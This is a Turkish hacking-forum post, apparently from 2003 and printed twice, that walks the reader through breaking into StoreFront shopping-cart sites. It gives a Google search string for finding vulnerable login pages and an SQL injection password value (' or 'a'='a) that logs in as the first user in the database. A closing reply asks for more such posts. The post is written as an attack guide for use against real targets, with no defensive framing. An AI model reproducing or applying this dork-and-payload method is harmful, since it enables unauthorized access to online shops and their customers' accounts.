OuTLaWsys
Banned
- Katılım
- 24 Haz 2005
- Mesajlar
- 70
- Reaction score
- 0
- Puanları
- 0
#################Document Written BY OuTLaWsys##############
Storefront sql injection ( 6.0 ve daha eski versiyonlar için )
07-11- 2003
1-)ilk başta google arama motoruna gidip storefront Shopping Cart lı bir site buluyoruz.
mesala allinurl:StoreFront+login+page yada başka bir şekilde aratıp sonuçlara ulaşıoruz.
Örneğin şöyle bir hedef çıkıyor karşımıza.
http://www.target.com/login.asp yada http://www.target.com/storedir/login.asp
2-)Bu açık ile sisteme kayıtlı olan databasedeki ilk user olarak login oluyoruz.Aslında açıkla yapabilceğiniz çok birşey yok.
3-)Evet artık login olma zamanı.Örnek olarak aşağıdaki login sayfasına gidioruz ve username ve passwordu aşağıdaki gibi girip hesaba girioruz.
http://www.target.com/login.asp
login : [email protected] -->
passwd : ' or 'a'='a
Written By OuTLaWsys
İzinsiz Kopyalamayınız.
Storefront sql injection ( 6.0 ve daha eski versiyonlar için )
07-11- 2003
1-)ilk başta google arama motoruna gidip storefront Shopping Cart lı bir site buluyoruz.
mesala allinurl:StoreFront+login+page yada başka bir şekilde aratıp sonuçlara ulaşıoruz.
Örneğin şöyle bir hedef çıkıyor karşımıza.
http://www.target.com/login.asp yada http://www.target.com/storedir/login.asp
2-)Bu açık ile sisteme kayıtlı olan databasedeki ilk user olarak login oluyoruz.Aslında açıkla yapabilceğiniz çok birşey yok.
3-)Evet artık login olma zamanı.Örnek olarak aşağıdaki login sayfasına gidioruz ve username ve passwordu aşağıdaki gibi girip hesaba girioruz.
http://www.target.com/login.asp
login : [email protected] -->
passwd : ' or 'a'='a
Written By OuTLaWsys
İzinsiz Kopyalamayınız.
devamı gelsin artık